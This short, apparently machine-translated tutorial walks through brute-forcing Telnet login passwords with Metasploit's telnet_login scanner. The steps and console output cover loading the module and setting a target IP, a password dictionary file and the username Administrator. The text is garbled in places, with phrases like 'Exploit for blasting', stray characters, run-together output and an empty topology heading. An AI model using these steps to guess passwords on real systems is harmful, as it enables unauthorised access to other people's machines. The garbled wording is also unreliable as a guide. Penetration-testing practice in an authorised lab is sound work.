Network topology:
1. Enter Metasploit:
[email protected]:~# msfconsole
2. Make a database connection:
msf > db_connect msf_user:[email protected]/msf_database[*] Rebuilding the module cache in the background...msf > db_status[*] postgresql connected to msf_database
3. Perform a search under the Telnet module
msf > search telnet_login
================
Name Disclosure Date Rank Description
Auxiliary/scanner/telnet/telnet_login normal Telnet login Check scanner
4. Use the module:
msf > use auxiliary/scanner/telnet/telnet_login
MSF auxiliary (Scanner/telnet/telnet_login) >
5. Review the configuration options:
msf auxiliary(scanner/telnet/telnet_login) > show options
Module Options (Auxiliary/scanner/telnet/telnet_login):
6. Configure the options:
auliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.152.129
9 ""
RHOSTS = 192.168.152.129 target host settings
Set Pass_file/root/pass Select Password Dictionary table
Set USERNAME Administrator setting user name
Exploit for blasting
7. View Results
Speed depends on the complexity of the password and the size of the dictionary table
Burst Telnet login Password